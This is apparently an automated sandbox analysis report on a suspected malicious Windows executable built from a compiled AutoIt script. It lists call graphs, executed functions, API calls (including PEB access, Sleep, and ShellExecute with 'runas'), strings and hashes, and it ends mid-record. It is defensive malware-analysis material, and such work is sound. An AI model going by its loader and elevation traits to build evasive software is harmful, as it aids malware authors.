86668 47fea2 194 API calls __itow_s 86644->86668 86667 47f135 194 API calls 86645->86667 86647 40e0a0 52 API calls 86647->86663 86650 408f40 VariantClear 86652 481156 86650->86652 86651 480aff 86651->86650 86654 408f40 VariantClear 86652->86654 86653 40c2c0 52 API calls 86653->86663 86655 48115e 86654->86655 86655->86634 86656 480ff5 86675 45e737 90 API calls 3 library calls 86656->86675 86657 401980 53 API calls 86657->86663 86659 40e710 53 API calls 86659->86663 86660 40a780 194 API calls 86660->86663 86661 408e80 VariantClear 86661->86663 86663->86647 86663->86651 86663->86653 86663->86656 86663->86657 86663->86659 86663->86660 86663->86661 86670 45377f 52 API calls 86663->86670 86671 45e951 53 API calls 86663->86671 86672 40e830 53 API calls 86663->86672 86673 47925f 53 API calls 86663->86673 86674 47fcff 194 API calls 86663->86674 86667->86651 86668->86651 86669->86651 86670->86663 86671->86663 86672->86663 86673->86663 86674->86663 86675->86651 86676 42b14b 86683 40bc10 86676->86683 86678 42b159 86679 4096a0 331 API calls 86678->86679 86680 42b177 86679->86680 86694 44b92d VariantClear 86680->86694 86682 42bc5b 86684 40bc24 86683->86684 86685 40bc17 86683->86685 86687 40bc2a 86684->86687 86688 40bc3c 86684->86688 86686 408e80 VariantClear 86685->86686 86689 40bc1f 86686->86689 86690 408e80 VariantClear 86687->86690 86691 4115d7 52 API calls 86688->86691 86689->86678 86692 40bc33 86690->86692 86693 40bc43 86691->86693 86692->86678 86693->86678 86694->86682 86695 425b2b 86700 40f000 86695->86700 86699 425b3a 86701 4115d7 52 API calls 86700->86701 86702 40f007 86701->86702 86703 4276ea 86702->86703 86709 40f030 86702->86709 86708 41130a 51 API calls __cinit 86708->86699 86710 40f039 86709->86710 86711 40f01a 86709->86711 86739 41130a 51 API calls __cinit 86710->86739 86713 40e500 86711->86713 86714 40bc70 52 API calls 86713->86714 86715 40e515 GetVersionExW 86714->86715 86716 402160 52 API calls 86715->86716 86717 40e557 86716->86717 86740 40e660 86717->86740 86723 40e5e0 86729 4276d5 GetSystemInfo 86723->86729 86754 40efd0 86723->86754 86724 40e5cd GetCurrentProcess 86761 40ef20 LoadLibraryA GetProcAddress 86724->86761 86725 4276c6 GetSystemInfo 86725->86729 86727 427674 86727->86725 86732 40e629 86758 40ef90 86732->86758 86735 40e641 FreeLibrary 86736 40e644 86735->86736 86737 40e653 FreeLibrary 86736->86737 86738 40e656 86736->86738 86737->86738 86738->86708 86739->86711 86741 40e667 86740->86741 86742 42761d 86741->86742 86743 40c600 52 API calls 86741->86743 86744 40e55c 86743->86744 86745 40e680 86744->86745 86746 40e687 86745->86746 86747 427616 86746->86747 86748 40c600 52 API calls 86746->86748 86749 40e566 86748->86749 86749->86727 86750 40ef60 86749->86750 86751 40e5c8 86750->86751 86752 40ef66 LoadLibraryA 86750->86752 86751->86723 86751->86724 86752->86751 86753 40ef77 GetProcAddress 86752->86753 86753->86751 86755 40e620 86754->86755 86756 40efd6 LoadLibraryA 86754->86756 86755->86725 86755->86732 86756->86755 86757 40efe7 GetProcAddress 86756->86757 86757->86755 86762 40efb0 LoadLibraryA GetProcAddress 86758->86762 86760 40e632 GetNativeSystemInfo 86760->86735 86760->86736 86761->86723 86762->86760 86763 425b5e 86768 40c7f0 86763->86768 86767 425b6d 86803 40db10 52 API calls 86768->86803 86770 40c82a 86804 410ab0 6 API calls 86770->86804 86772 40c86d 86773 40bc70 52 API calls 86772->86773 86774 40c877 86773->86774 86775 40bc70 52 API calls 86774->86775 86776 40c881 86775->86776 86777 40bc70 52 API calls 86776->86777 86778 40c88b 86777->86778 86779 40bc70 52 API calls 86778->86779 86780 40c8d1 86779->86780 86781 40bc70 52 API calls 86780->86781 86782 40c991 86781->86782 86805 40d2c0 52 API calls 86782->86805 86784 40c99b 86806 40d0d0 53 API calls 86784->86806 86786 40c9c1 86787 40bc70 52 API calls 86786->86787 86788 40c9cb 86787->86788 86807 40e310 53 API calls 86788->86807 86790 40ca28 86791 408f40 VariantClear 86790->86791 86792 40ca30 86791->86792 86793 408f40 VariantClear 86792->86793 86794 40ca38 GetStdHandle 86793->86794 86795 429630 86794->86795 86796 40ca87 86794->86796 86795->86796 86797 429639 86795->86797 86802 41130a 51 API calls __cinit 86796->86802 86808 4432c0 57 API calls 86797->86808 86799 429641 86809 44b6ab CreateThread 86799->86809 86801 42964f CloseHandle 86801->86796 86802->86767 86803->86770 86804->86772 86805->86784 86806->86786 86807->86790 86808->86799 86809->86801 86810 44b5cb 58 API calls 86809->86810 86811 3ede3c0 86825 3edc010 86811->86825 86813 3ede49b 86828 3ede2b0 86813->86828 86827 3edc69b 86825->86827 86831 3edf4c0 GetPEB 86825->86831 86827->86813 86829 3ede2b9 Sleep 86828->86829 86830 3ede2c7 86829->86830 86831->86827 86832 425b6f 86837 40dc90 86832->86837 86836 425b7e 86838 40bc70 52 API calls 86837->86838 86839 40dd03 86838->86839 86846 40f210 86839->86846 86841 426a97 86843 40dd96 86843->86841 86844 40ddb7 86843->86844 86849 40dc00 52 API calls 2 library calls 86843->86849 86845 41130a 51 API calls __cinit 86844->86845 86845->86836 86850 40f250 RegOpenKeyExW 86846->86850 86848 40f230 86848->86843 86849->86843 86851 425e17 86850->86851 86852 40f275 RegQueryValueExW 86850->86852 86851->86848 86853 40f2c3 RegCloseKey 86852->86853 86854 40f298 86852->86854 86853->86848 86855 40f2a9 RegCloseKey 86854->86855 86856 425e1d 86854->86856 86855->86848

                                                Executed Functions

                                                Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 004096C1
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 0040970C
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                • _memmove.LIBCMT ref: 00409D96
                                                • _memmove.LIBCMT ref: 0040A6C4
                                                • _memmove.LIBCMT ref: 004297E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                • String ID:
                                                • API String ID: 2383988440-0
                                                • Opcode ID: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                                                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                • Opcode Fuzzy Hash: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                                                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                Strings
                                                • runas, xrefs: 0042E2AD, 0042E2DC
                                                • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                • API String ID: 2495805114-3383388033
                                                • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1931 40e5ec-40e60c 1918->1931 1932 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1932 1933 4276c6-4276ca GetSystemInfo 1919->1933 1920->1919 1929 427698-4276a8 1920->1929 1921->1919 1925 427636-427640 1922->1925 1926 42762b-427631 1922->1926 1927 40e5a5-40e5ae 1923->1927 1928 427654-427657 1923->1928 1925->1918 1926->1918 1935 40e5b4 1927->1935 1936 427645-42764f 1927->1936 1928->1918 1934 42765d-42766f 1928->1934 1937 4276b0 1929->1937 1938 4276aa-4276ae 1929->1938 1940 40e612-40e623 call 40efd0 1931->1940 1941 4276d5-4276df GetSystemInfo 1931->1941 1932->1931 1947 40e5e8 1932->1947 1933->1941 1934->1918 1935->1918 1936->1918 1937->1919 1938->1919 1940->1933 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1931 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                • String ID: 0SH
                                                • API String ID: 3363477735-851180471
                                                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: IsThemeActive$uxtheme.dll
                                                • API String ID: 2574300362-3542929980
                                                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                • TranslateMessage.USER32(?), ref: 00409556
                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                • API String ID: 1762048999-758534266
                                                • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • __wcsicoll.LIBCMT ref: 00402007
                                                • __wcsicoll.LIBCMT ref: 0040201D
                                                • __wcsicoll.LIBCMT ref: 00402033
                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                • __wcsicoll.LIBCMT ref: 00402049
                                                • _wcscpy.LIBCMT ref: 0040207C
                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                • API String ID: 3948761352-1609664196
                                                • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                • __wsplitpath.LIBCMT ref: 0040E41C
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcsncat.LIBCMT ref: 0040E433
                                                • __wmakepath.LIBCMT ref: 0040E44F
                                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • _wcscpy.LIBCMT ref: 0040E487
                                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                • _wcscat.LIBCMT ref: 00427541
                                                • _wcslen.LIBCMT ref: 00427551
                                                • _wcslen.LIBCMT ref: 00427562
                                                • _wcscat.LIBCMT ref: 0042757C
                                                • _wcsncpy.LIBCMT ref: 004275BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                • String ID: Include$\
                                                • API String ID: 3173733714-3429789819
                                                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • _fseek.LIBCMT ref: 0045292B
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                • __fread_nolock.LIBCMT ref: 00452961
                                                • __fread_nolock.LIBCMT ref: 00452971
                                                • __fread_nolock.LIBCMT ref: 0045298A
                                                • __fread_nolock.LIBCMT ref: 004529A5
                                                • _fseek.LIBCMT ref: 004529BF
                                                • _malloc.LIBCMT ref: 004529CA
                                                • _malloc.LIBCMT ref: 004529D6
                                                • __fread_nolock.LIBCMT ref: 004529E7
                                                • _free.LIBCMT ref: 00452A17
                                                • _free.LIBCMT ref: 00452A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                • String ID:
                                                • API String ID: 1255752989-0
                                                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
